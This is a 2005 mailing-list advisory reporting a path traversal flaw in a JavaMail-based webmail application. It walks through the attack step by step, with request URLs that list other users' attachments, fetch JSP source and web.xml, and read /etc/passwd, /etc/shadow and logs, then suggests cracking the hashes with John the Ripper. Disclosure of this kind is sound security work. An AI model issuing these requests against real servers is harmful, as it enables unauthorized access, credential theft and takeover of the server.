<<< Date Index >>>     <<< Thread Index >>>

Javamail Multiple Information Disclosure Vulnerabilities




Javamail Multiple Information Disclosure Vulnerabilities

May 25, 2005 Yangon, Myanmar.

Vulnerable Systems:
 * JavaMail API 1.3
 * JavaMail API 1.2
 * JavaMail API 1.1.3

Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows

Failed to restrict to accessing other directory and files in ReadMessage.jsp

File Name:<%=mp.getFileName()%><br>
                    Type: <%=abc.getContent_Type()%><br>
                    Size: <%=abc.getMsgSize()/1024%>Kb<br><a 
href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" 
target="_new"> download </a><br>

<%=abc.getFilePath() + "/" + abc.getFileName() %>"

It will give attacker any file on system, because it said getFilePath() + "/" + 
abc.getFileName()

1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information

1. Open specific mailbox attachment

When user download message from Javamail domain from webmail, attacker may 
notice URL 
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@xxxxxxxxxxx/messageid123@user/filename.extension

Then noticed URL lead to /var/folders so tried to switched folders.

http://example.com/var/serviceprovider/web/mailboxesdir/user@xxxxxxxxxxx/messageid123@user

But got errors. So finally when reached to this URL

http://example.com/mailboxesdir/user@xxxxxxxxxxx/

It?s made listing of user@xxxxxxxxxxx attachments are there. 

Even unauthorized users are able to view specific mailbox attachment. Attacker 
need to know only username in order to get attachments listing. 

http://example.com/mailboxesdir/user2@xxxxxxxxxxx/

http://example.com/mailboxesdir/user3@xxxxxxxxxxx/


2. Download configuration information of javamail

And noticed that docdownloadfile.jsp redirect to where the file are located on 
server with the Parameter f. actually web browser got the redirect name 

http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@xxxxxxxxxxx/messageid123@user/filename.extension

This information lead to get web.xml

http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml


Which give configuration information of javamail

Download source code of jsp file
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp




3. Target machine Root/Admin Compromise

In UNIX /etc/passwd and /etc/shadow are important folder which 

A little bit curious and look in web browser typing that 
http://example.com/Download?/etc/passwd

example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh

Then Crack Unix password files with John the Ripper.

John can be found practically anywhere. For example: try going to altavista.com 
and running a search for 'john the ripper'. 

http://example.com/Download?/etc/shadow

root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::

http://example.com/Download?/etc/group
/etc/group file:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:


When attacker get information of root/admin user of target server and then 
attacker can lead to any attack. Attacker may do Website defacement, database 
altering, stealing and more.

4. Download server information

http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done?.

By 
Thet Aung Min Latt thetaung@xxxxxxxxx
http://thetaung.amyanmar.com